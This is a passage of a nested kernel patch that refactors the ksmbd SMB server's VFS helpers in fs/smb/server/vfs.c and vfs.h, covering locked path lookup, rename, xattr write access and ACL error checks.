+ 	err = vfs_mkdir(user_ns, d_inode(path.dentry), dentry, mode);
+-	if (err) {
+-		goto out;
+-	} else if (d_unhashed(dentry)) {
++	if (!err && d_unhashed(dentry)) {
+ 		struct dentry *d;
+ 
+ 		d = lookup_one(user_ns, dentry->d_name.name, dentry->d_parent,
+ 			       dentry->d_name.len);
+ 		if (IS_ERR(d)) {
+ 			err = PTR_ERR(d);
+-			goto out;
++			goto out_err;
+ 		}
+ 		if (unlikely(d_is_negative(d))) {
+ 			dput(d);
+ 			err = -ENOENT;
+-			goto out;
++			goto out_err;
+ 		}
+ 
+ 		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry), d_inode(d));
+ 		dput(d);
+ 	}
+-out:
++
++out_err:
+ 	done_path_create(&path, dentry);
+ 	if (err)
+ 		pr_err("mkdir(%s): creation failed (err:%d)\n", name, err);
+@@ -358,15 +364,15 @@ out:
+  * @fid:	file id of open file
+  * @count:	read byte count
+  * @pos:	file pos
++ * @rbuf:	read data buffer
+  *
+  * Return:	number of read bytes on success, otherwise error
+  */
+ int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
+-		   loff_t *pos)
++		   loff_t *pos, char *rbuf)
+ {
+ 	struct file *filp = fp->filp;
+ 	ssize_t nbytes = 0;
+-	char *rbuf = work->aux_payload_buf;
+ 	struct inode *inode = file_inode(filp);
+ 
+ 	if (S_ISDIR(inode->i_mode))
+@@ -410,7 +416,8 @@ static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+ {
+ 	char *stream_buf = NULL, *wbuf;
+ 	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	size_t size, v_len;
++	size_t size;
++	ssize_t v_len;
+ 	int err = 0;
+ 
+ 	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
+@@ -427,14 +434,14 @@ static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+ 				       fp->stream.name,
+ 				       fp->stream.size,
+ 				       &stream_buf);
+-	if ((int)v_len < 0) {
++	if (v_len < 0) {
+ 		pr_err("not found stream in xattr : %zd\n", v_len);
+-		err = (int)v_len;
++		err = v_len;
+ 		goto out;
+ 	}
+ 
+ 	if (v_len < size) {
+-		wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++		wbuf = kvzalloc(size, GFP_KERNEL);
+ 		if (!wbuf) {
+ 			err = -ENOMEM;
+ 			goto out;
+@@ -449,11 +456,12 @@ static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+ 	memcpy(&stream_buf[*pos], buf, count);
+ 
+ 	err = ksmbd_vfs_setxattr(user_ns,
+-				 fp->filp->f_path.dentry,
++				 &fp->filp->f_path,
+ 				 fp->stream.name,
+ 				 (void *)stream_buf,
+ 				 size,
+-				 0);
++				 0,
++				 true);
+ 	if (err < 0)
+ 		goto out;
+ 
+@@ -510,6 +518,9 @@ int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		}
+ 	}
+ 
++	/* Reserve lease break for parent dir at closing time */
++	fp->reserve_lease_break = true;
++
+ 	/* Do we need to break any of a levelII oplock? */
+ 	smb_break_all_levII_oplock(work, fp, 1);
+ 
+@@ -581,54 +592,32 @@ int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id)
+  *
+  * Return:	0 on success, otherwise error
+  */
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name)
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, const struct path *path)
+ {
+ 	struct user_namespace *user_ns;
+-	struct path path;
+-	struct dentry *parent;
++	struct dentry *parent = path->dentry->d_parent;
+ 	int err;
+ 
+ 	if (ksmbd_override_fsids(work))
+ 		return -ENOMEM;
+ 
+-	err = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "can't get %s, err %d\n", name, err);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	user_ns = mnt_user_ns(path.mnt);
+-	parent = dget_parent(path.dentry);
+-	err = ksmbd_vfs_lock_parent(user_ns, parent, path.dentry);
+-	if (err) {
+-		dput(parent);
+-		path_put(&path);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	if (!d_inode(path.dentry)->i_nlink) {
++	if (!d_inode(path->dentry)->i_nlink) {
+ 		err = -ENOENT;
+ 		goto out_err;
+ 	}
+ 
+-	if (S_ISDIR(d_inode(path.dentry)->i_mode)) {
+-		err = vfs_rmdir(user_ns, d_inode(parent), path.dentry);
++	user_ns = mnt_user_ns(path->mnt);
++	if (S_ISDIR(d_inode(path->dentry)->i_mode)) {
++		err = vfs_rmdir(user_ns, d_inode(parent), path->dentry);
+ 		if (err && err != -ENOTEMPTY)
+-			ksmbd_debug(VFS, "%s: rmdir failed, err %d\n", name,
+-				    err);
++			ksmbd_debug(VFS, "rmdir failed, err %d\n", err);
+ 	} else {
+-		err = vfs_unlink(user_ns, d_inode(parent), path.dentry, NULL);
++		err = vfs_unlink(user_ns, d_inode(parent), path->dentry, NULL);
+ 		if (err)
+-			ksmbd_debug(VFS, "%s: unlink failed, err %d\n", name,
+-				    err);
++			ksmbd_debug(VFS, "unlink failed, err %d\n", err);
+ 	}
+ 
+ out_err:
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	path_put(&path);
+ 	ksmbd_revert_fsids(work);
+ 	return err;
+ }
+@@ -687,149 +676,120 @@ out1:
+ 	return err;
+ }
+ 
+-static int ksmbd_validate_entry_in_use(struct dentry *src_dent)
++int ksmbd_vfs_rename(struct ksmbd_work *work, const struct path *old_path,
++		     char *newname, int flags)
+ {
+-	struct dentry *dst_dent;
++	struct dentry *old_parent, *new_dentry, *trap;
++	struct dentry *old_child = old_path->dentry;
++	struct path new_path;
++	struct qstr new_last;
++	struct renamedata rd;
++	struct filename *to;
++	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
++	struct ksmbd_file *parent_fp;
++	int new_type;
++	int err, lookup_flags = LOOKUP_NO_SYMLINKS;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
+ 
+-	spin_lock(&src_dent->d_lock);
+-	list_for_each_entry(dst_dent, &src_dent->d_subdirs, d_child) {
+-		struct ksmbd_file *child_fp;
++	to = getname_kernel(newname);
++	if (IS_ERR(to)) {
++		err = PTR_ERR(to);
++		goto revert_fsids;
++	}
+ 
+-		if (d_really_is_negative(dst_dent))
+-			continue;
++retry:
++	err = vfs_path_parent_lookup(to, lookup_flags | LOOKUP_BENEATH,
++				     &new_path, &new_last, &new_type,
++				     &share_conf->vfs_path);
++	if (err)
++		goto out1;
+ 
+-		child_fp = ksmbd_lookup_fd_inode(d_inode(dst_dent));
+-		if (child_fp) {
+-			spin_unlock(&src_dent->d_lock);
+-			ksmbd_debug(VFS, "Forbid rename, sub file/dir is in use\n");
+-			return -EACCES;
+-		}
++	if (old_path->mnt != new_path.mnt) {
++		err = -EXDEV;
++		goto out2;
+ 	}
+-	spin_unlock(&src_dent->d_lock);
+ 
+-	return 0;
+-}
++	err = mnt_want_write(old_path->mnt);
++	if (err)
++		goto out2;
+ 
+-static int __ksmbd_vfs_rename(struct ksmbd_work *work,
+-			      struct user_namespace *src_user_ns,
+-			      struct dentry *src_dent_parent,
+-			      struct dentry *src_dent,
+-			      struct user_namespace *dst_user_ns,
+-			      struct dentry *dst_dent_parent,
+-			      struct dentry *trap_dent,
+-			      char *dst_name)
+-{
+-	struct dentry *dst_dent;
+-	int err;
++	trap = lock_rename_child(old_child, new_path.dentry);
+ 
+-	if (!work->tcon->posix_extensions) {
+-		err = ksmbd_validate_entry_in_use(src_dent);
+-		if (err)
+-			return err;
++	old_parent = dget(old_child->d_parent);
++	if (d_unhashed(old_child)) {
++		err = -EINVAL;
++		goto out3;
+ 	}
+ 
+-	if (d_really_is_negative(src_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(dst_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(src_dent))
+-		return -ENOENT;
+-	if (src_dent == trap_dent)
+-		return -EINVAL;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
++	parent_fp = ksmbd_lookup_fd_inode(old_child->d_parent);
++	if (parent_fp) {
++		if (parent_fp->daccess & FILE_DELETE_LE) {
++			pr_err("parent dir is opened with delete access\n");
++			err = -ESHARE;
++			ksmbd_fd_put(work, parent_fp);
++			goto out3;
++		}
++		ksmbd_fd_put(work, parent_fp);
++	}
+ 
+-	dst_dent = lookup_one(dst_user_ns, dst_name, dst_dent_parent,
+-			      strlen(dst_name));
+-	err = PTR_ERR(dst_dent);
+-	if (IS_ERR(dst_dent)) {
+-		pr_err("lookup failed %s [%d]\n", dst_name, err);
+-		goto out;
++	new_dentry = lookup_one_qstr_excl(&new_last, new_path.dentry,
++					  lookup_flags | LOOKUP_RENAME_TARGET);
++	if (IS_ERR(new_dentry)) {
++		err = PTR_ERR(new_dentry);
++		goto out3;
+ 	}
+ 
+-	err = -ENOTEMPTY;
+-	if (dst_dent != trap_dent && !d_really_is_positive(dst_dent)) {
+-		struct renamedata rd = {
+-			.old_mnt_userns	= src_user_ns,
+-			.old_dir	= d_inode(src_dent_parent),
+-			.old_dentry	= src_dent,
+-			.new_mnt_userns	= dst_user_ns,
+-			.new_dir	= d_inode(dst_dent_parent),
+-			.new_dentry	= dst_dent,
+-		};
+-		err = vfs_rename(&rd);
++	if (d_is_symlink(new_dentry)) {
++		err = -EACCES;
++		goto out4;
+ 	}
+-	if (err)
+-		pr_err("vfs_rename failed err %d\n", err);
+-	if (dst_dent)
+-		dput(dst_dent);
+-out:
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+ 
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname)
+-{
+-	struct user_namespace *user_ns;
+-	struct path dst_path;
+-	struct dentry *src_dent_parent, *dst_dent_parent;
+-	struct dentry *src_dent, *trap_dent, *src_child;
+-	char *dst_name;
+-	int err;
++	if ((flags & RENAME_NOREPLACE) && d_is_positive(new_dentry)) {
++		err = -EEXIST;
++		goto out4;
++	}
+ 
+-	dst_name = extract_last_component(newname);
+-	if (!dst_name) {
+-		dst_name = newname;
+-		newname = "";
++	if (old_child == trap) {
++		err = -EINVAL;
++		goto out4;
+ 	}
+ 
+-	src_dent_parent = dget_parent(fp->filp->f_path.dentry);
+-	src_dent = fp->filp->f_path.dentry;
++	if (new_dentry == trap) {
++		err = -ENOTEMPTY;
++		goto out4;
++	}
++
++	rd.old_mnt_userns	= mnt_user_ns(old_path->mnt),
++	rd.old_dir		= d_inode(old_parent),
++	rd.old_dentry		= old_child,
++	rd.new_mnt_userns	= mnt_user_ns(new_path.mnt),
++	rd.new_dir		= new_path.dentry->d_inode,
++	rd.new_dentry		= new_dentry,
++	rd.flags		= flags,
++	rd.delegated_inode	= NULL,
++	err = vfs_rename(&rd);
++	if (err)
++		ksmbd_debug(VFS, "vfs_rename failed err %d\n", err);
+ 
+-	err = ksmbd_vfs_kern_path(work, newname,
+-				  LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
+-				  &dst_path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "Cannot get path for %s [%d]\n", newname, err);
+-		goto out;
++out4:
++	dput(new_dentry);
++out3:
++	dput(old_parent);
++	unlock_rename(old_parent, new_path.dentry);
++	mnt_drop_write(old_path->mnt);
++out2:
++	path_put(&new_path);
++
++	if (retry_estale(err, lookup_flags)) {
++		lookup_flags |= LOOKUP_REVAL;
++		goto retry;
+ 	}
+-	dst_dent_parent = dst_path.dentry;
+-
+-	trap_dent = lock_rename(src_dent_parent, dst_dent_parent);
+-	dget(src_dent);
+-	dget(dst_dent_parent);
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	src_child = lookup_one(user_ns, src_dent->d_name.name, src_dent_parent,
+-			       src_dent->d_name.len);
+-	if (IS_ERR(src_child)) {
+-		err = PTR_ERR(src_child);
+-		goto out_lock;
+-	}
+-
+-	if (src_child != src_dent) {
+-		err = -ESTALE;
+-		dput(src_child);
+-		goto out_lock;
+-	}
+-	dput(src_child);
+-
+-	err = __ksmbd_vfs_rename(work,
+-				 user_ns,
+-				 src_dent_parent,
+-				 src_dent,
+-				 mnt_user_ns(dst_path.mnt),
+-				 dst_dent_parent,
+-				 trap_dent,
+-				 dst_name);
+-out_lock:
+-	dput(src_dent);
+-	dput(dst_dent_parent);
+-	unlock_rename(src_dent_parent, dst_dent_parent);
+-	path_put(&dst_path);
+-out:
+-	dput(src_dent_parent);
++out1:
++	putname(to);
++revert_fsids:
++	ksmbd_revert_fsids(work);
+ 	return err;
+ }
+ 
+@@ -892,7 +852,7 @@ ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list)
+ 	if (size <= 0)
+ 		return size;
+ 
+-	vlist = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++	vlist = kvzalloc(size, GFP_KERNEL);
+ 	if (!vlist)
+ 		return -ENOMEM;
+ 
+@@ -950,28 +910,38 @@ ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
+ /**
+  * ksmbd_vfs_setxattr() - vfs helper for smb set extended attributes value
+  * @user_ns:	user namespace
+- * @dentry:	dentry to set XATTR at
+- * @name:	xattr name for setxattr
+- * @value:	xattr value to set
+- * @size:	size of xattr value
++ * @path:	path of dentry to set XATTR at
++ * @attr_name:	xattr name for setxattr
++ * @attr_value:	xattr value to set
++ * @attr_size:	size of xattr value
+  * @flags:	destination buffer length
++ * @get_write:	get write access to a mount
+  *
+  * Return:	0 on success, otherwise error
+  */
+ int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags)
++		       const struct path *path, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags,
++		       bool get_write)
+ {
+ 	int err;
+ 
++	if (get_write == true) {
++		err = mnt_want_write(path->mnt);
++		if (err)
++			return err;
++	}
++
+ 	err = vfs_setxattr(user_ns,
+-			   dentry,
++			   path->dentry,
+ 			   attr_name,
+ 			   attr_value,
+ 			   attr_size,
+ 			   flags);
+ 	if (err)
+ 		ksmbd_debug(VFS, "setxattr failed, err %d\n", err);
++	if (get_write == true)
++		mnt_drop_write(path->mnt);
+ 	return err;
+ }
+ 
+@@ -1075,19 +1045,34 @@ int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+ }
+ 
+ int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name)
++			   const struct path *path, char *attr_name)
+ {
+-	return vfs_removexattr(user_ns, dentry, attr_name);
++	int err;
++
++	err = mnt_want_write(path->mnt);
++	if (err)
++		return err;
++
++	err = vfs_removexattr(user_ns, path->dentry, attr_name);
++	mnt_drop_write(path->mnt);
++
++	return err;
+ }
+ 
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry)
++int ksmbd_vfs_unlink(struct file *filp)
+ {
+ 	int err = 0;
++	struct dentry *dir, *dentry = filp->f_path.dentry;
++	struct user_namespace *user_ns = file_mnt_user_ns(filp);
+ 
+-	err = ksmbd_vfs_lock_parent(user_ns, dir, dentry);
++	err = mnt_want_write(filp->f_path.mnt);
+ 	if (err)
+ 		return err;
++
++	dir = dget_parent(dentry);
++	err = ksmbd_vfs_lock_parent(dir, dentry);
++	if (err)
++		goto out;
+ 	dget(dentry);
+ 
+ 	if (S_ISDIR(d_inode(dentry)->i_mode))
+@@ -1099,6 +1084,9 @@ int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+ 	inode_unlock(d_inode(dir));
+ 	if (err)
+ 		ksmbd_debug(VFS, "failed to delete, err %d\n", err);
++out:
++	dput(dir);
++	mnt_drop_write(filp->f_path.mnt);
+ 
+ 	return err;
+ }
+@@ -1201,32 +1189,29 @@ static int ksmbd_vfs_lookup_in_dir(const struct path *dir, char *name,
+ }
+ 
+ /**
+- * ksmbd_vfs_kern_path() - lookup a file and get path info
+- * @name:	file path that is relative to share
+- * @flags:	lookup flags
+- * @path:	if lookup succeed, return path info
++ * ksmbd_vfs_kern_path_locked() - lookup a file and get path info
++ * @name:		file path that is relative to share
++ * @flags:		lookup flags
++ * @parent_path:	if lookup succeed, return parent_path info
++ * @path:		if lookup succeed, return path info
+  * @caseless:	caseless filename lookup
+  *
+  * Return:	0 on success, otherwise error
+  */
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+-			unsigned int flags, struct path *path, bool caseless)
++int ksmbd_vfs_kern_path_locked(struct ksmbd_work *work, char *name,
++			       unsigned int flags, struct path *parent_path,
++			       struct path *path, bool caseless)
+ {
+ 	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
+ 	int err;
+ 
+-	flags |= LOOKUP_BENEATH;
+-	err = vfs_path_lookup(share_conf->vfs_path.dentry,
+-			      share_conf->vfs_path.mnt,
+-			      name,
+-			      flags,
+-			      path);
++	err = ksmbd_vfs_path_lookup_locked(share_conf, name, flags, parent_path,
++					   path);
+ 	if (!err)
+ 		return 0;
+ 
+ 	if (caseless) {
+ 		char *filepath;
+-		struct path parent;
+ 		size_t path_len, remain_len;
+ 
+ 		filepath = kstrdup(name, GFP_KERNEL);
+@@ -1236,10 +1221,10 @@ int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+ 		path_len = strlen(filepath);
+ 		remain_len = path_len;
+ 
+-		parent = share_conf->vfs_path;
+-		path_get(&parent);
++		*parent_path = share_conf->vfs_path;
++		path_get(parent_path);
+ 
+-		while (d_can_lookup(parent.dentry)) {
++		while (d_can_lookup(parent_path->dentry)) {
+ 			char *filename = filepath + path_len - remain_len;
+ 			char *next = strchrnul(filename, '/');
+ 			size_t filename_len = next - filename;
+@@ -1248,12 +1233,11 @@ int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+ 			if (filename_len == 0)
+ 				break;
+ 
+-			err = ksmbd_vfs_lookup_in_dir(&parent, filename,
++			err = ksmbd_vfs_lookup_in_dir(parent_path, filename,
+ 						      filename_len,
+ 						      work->conn->um);
+-			path_put(&parent);
+ 			if (err)
+-				goto out;
++				goto out2;
+ 
+ 			next[0] = '\0';
+ 
+@@ -1261,26 +1245,50 @@ int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+ 					      share_conf->vfs_path.mnt,
+ 					      filepath,
+ 					      flags,
+-					      &parent);
++					      path);
+ 			if (err)
+-				goto out;
+-			else if (is_last) {
+-				*path = parent;
+-				goto out;
+-			}
++				goto out2;
++			else if (is_last)
++				goto out1;
++			path_put(parent_path);
++			*parent_path = *path;
+ 
+ 			next[0] = '/';
+ 			remain_len -= filename_len + 1;
+ 		}
+ 
+-		path_put(&parent);
+ 		err = -EINVAL;
+-out:
++out2:
++		path_put(parent_path);
++out1:
+ 		kfree(filepath);
+ 	}
++
++	if (!err) {
++		err = mnt_want_write(parent_path->mnt);
++		if (err) {
++			path_put(path);
++			path_put(parent_path);
++			return err;
++		}
++
++		err = ksmbd_vfs_lock_parent(parent_path->dentry, path->dentry);
++		if (err) {
++			path_put(path);
++			path_put(parent_path);
++		}
++	}
+ 	return err;
+ }
+ 
++void ksmbd_vfs_kern_path_unlock(struct path *parent_path, struct path *path)
++{
++	inode_unlock(d_inode(parent_path->dentry));
++	mnt_drop_write(parent_path->mnt);
++	path_put(path);
++	path_put(parent_path);
++}
++
+ struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+ 					  const char *name,
+ 					  unsigned int flags,
+@@ -1299,13 +1307,13 @@ struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+ }
+ 
+ int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry)
++				const struct path *path)
+ {
+ 	char *name, *xattr_list = NULL;
+ 	ssize_t xattr_list_len;
+ 	int err = 0;
+ 
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+ 	if (xattr_list_len < 0) {
+ 		goto out;
+ 	} else if (!xattr_list_len) {
+@@ -1321,25 +1329,25 @@ int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+ 			     sizeof(XATTR_NAME_POSIX_ACL_ACCESS) - 1) ||
+ 		    !strncmp(name, XATTR_NAME_POSIX_ACL_DEFAULT,
+ 			     sizeof(XATTR_NAME_POSIX_ACL_DEFAULT) - 1)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			err = ksmbd_vfs_remove_xattr(user_ns, path, name);
+ 			if (err)
+ 				ksmbd_debug(SMB,
+ 					    "remove acl xattr failed : %s\n", name);
+ 		}
+ 	}
++
+ out:
+ 	kvfree(xattr_list);
+ 	return err;
+ }
+ 
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry)
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns, const struct path *path)
+ {
+ 	char *name, *xattr_list = NULL;
+ 	ssize_t xattr_list_len;
+ 	int err = 0;
+ 
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+ 	if (xattr_list_len < 0) {
+ 		goto out;
+ 	} else if (!xattr_list_len) {
+@@ -1352,7 +1360,7 @@ int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+ 		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+ 
+ 		if (!strncmp(name, XATTR_NAME_SD, XATTR_NAME_SD_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			err = ksmbd_vfs_remove_xattr(user_ns, path, name);
+ 			if (err)
+ 				ksmbd_debug(SMB, "remove xattr failed : %s\n", name);
+ 		}
+@@ -1376,7 +1384,7 @@ static struct xattr_smb_acl *ksmbd_vfs_make_xattr_posix_acl(struct user_namespac
+ 		return NULL;
+ 
+ 	posix_acls = get_acl(inode, acl_type);
+-	if (!posix_acls)
++	if (IS_ERR_OR_NULL(posix_acls))
+ 		return NULL;
+ 
+ 	smb_acl = kzalloc(sizeof(struct xattr_smb_acl) +
+@@ -1429,13 +1437,15 @@ out:
+ 
+ int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+ 			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len)
++			   const struct path *path,
++			   struct smb_ntsd *pntsd, int len,
++			   bool get_write)
+ {
+ 	int rc;
+ 	struct ndr sd_ndr = {0}, acl_ndr = {0};
+ 	struct xattr_ntacl acl = {0};
+ 	struct xattr_smb_acl *smb_acl, *def_smb_acl = NULL;
++	struct dentry *dentry = path->dentry;
+ 	struct inode *inode = d_inode(dentry);
+ 
+ 	acl.version = 4;
+@@ -1487,9 +1497,9 @@ int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+ 		goto out;
+ 	}
+ 
+-	rc = ksmbd_vfs_setxattr(user_ns, dentry,
++	rc = ksmbd_vfs_setxattr(user_ns, path,
+ 				XATTR_NAME_SD, sd_ndr.data,
+-				sd_ndr.offset, 0);
++				sd_ndr.offset, 0, get_write);
+ 	if (rc < 0)
+ 		pr_err("Failed to store XATTR ntacl :%d\n", rc);
+ 
+@@ -1577,8 +1587,9 @@ free_n_data:
+ }
+ 
+ int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da)
++				   const struct path *path,
++				   struct xattr_dos_attrib *da,
++				   bool get_write)
+ {
+ 	struct ndr n;
+ 	int err;
+@@ -1587,8 +1598,8 @@ int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+ 	if (err)
+ 		return err;
+ 
+-	err = ksmbd_vfs_setxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
+-				 (void *)n.data, n.offset, 0);
++	err = ksmbd_vfs_setxattr(user_ns, path, XATTR_NAME_DOS_ATTRIBUTE,
++				 (void *)n.data, n.offset, 0, get_write);
+ 	if (err)
+ 		ksmbd_debug(SMB, "failed to store dos attribute in xattr\n");
+ 	kfree(n.data);
+@@ -1824,10 +1835,11 @@ void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock)
+ }
+ 
+ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode)
++				 struct path *path)
+ {
+ 	struct posix_acl_state acl_state;
+ 	struct posix_acl *acls;
++	struct inode *inode = d_inode(path->dentry);
+ 	int rc;
+ 
+ 	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+@@ -1856,6 +1868,7 @@ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+ 		return -ENOMEM;
+ 	}
+ 	posix_state_to_acl(&acl_state, acls->a_entries);
++
+ 	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
+ 	if (rc < 0)
+ 		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+@@ -1868,23 +1881,25 @@ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+ 			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+ 				    rc);
+ 	}
++
+ 	free_acl_state(&acl_state);
+ 	posix_acl_release(acls);
+ 	return rc;
+ }
+ 
+ int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode, struct inode *parent_inode)
++				struct path *path, struct inode *parent_inode)
+ {
+ 	struct posix_acl *acls;
+ 	struct posix_acl_entry *pace;
++	struct inode *inode = d_inode(path->dentry);
+ 	int rc, i;
+ 
+ 	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+ 		return -EOPNOTSUPP;
+ 
+ 	acls = get_acl(parent_inode, ACL_TYPE_DEFAULT);
+-	if (!acls)
++	if (IS_ERR_OR_NULL(acls))
+ 		return -ENOENT;
+ 	pace = acls->a_entries;
+ 
+@@ -1906,6 +1921,7 @@ int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+ 			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+ 				    rc);
+ 	}
++
+ 	posix_acl_release(acls);
+ 	return rc;
+ }
+diff --git a/fs/smb/server/vfs.h b/fs/smb/server/vfs.h
+index 593059ca85112..e761dde2443e2 100644
+--- a/fs/smb/server/vfs.h
++++ b/fs/smb/server/vfs.h
+@@ -71,25 +71,23 @@ struct ksmbd_kstat {
+ 	__le32			file_attributes;
+ };
+ 
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child);
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns, struct dentry *dentry);
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++int ksmbd_vfs_lock_parent(struct dentry *parent, struct dentry *child);
++void ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+ 				   struct dentry *dentry, __le32 *daccess);
+ int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode);
+ int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode);
+-int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		   size_t count, loff_t *pos);
++int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
++		   loff_t *pos, char *rbuf);
+ int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		    char *buf, size_t count, loff_t *pos, bool sync,
+ 		    ssize_t *written);
+ int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id);
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name);
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, const struct path *path);
+ int ksmbd_vfs_link(struct ksmbd_work *work,
+ 		   const char *oldname, const char *newname);
+ int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat);
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname);
++int ksmbd_vfs_rename(struct ksmbd_work *work, const struct path *old_path,
++		     char *newname, int flags);
+ int ksmbd_vfs_truncate(struct ksmbd_work *work,
+ 		       struct ksmbd_file *fp, loff_t size);
+ struct srv_copychunk;
+@@ -110,15 +108,17 @@ ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
+ 				struct dentry *dentry, char *attr_name,
+ 				int attr_name_len);
+ int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags);
++		       const struct path *path, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags,
++		       bool get_write);
+ int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
+ 				size_t *xattr_stream_name_size, int s_type);
+ int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name);
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work,
+-			char *name, unsigned int flags, struct path *path,
+-			bool caseless);
++			   const struct path *path, char *attr_name);
++int ksmbd_vfs_kern_path_locked(struct ksmbd_work *work, char *name,
++			       unsigned int flags, struct path *parent_path,
++			       struct path *path, bool caseless);
++void ksmbd_vfs_kern_path_unlock(struct path *parent_path, struct path *path);
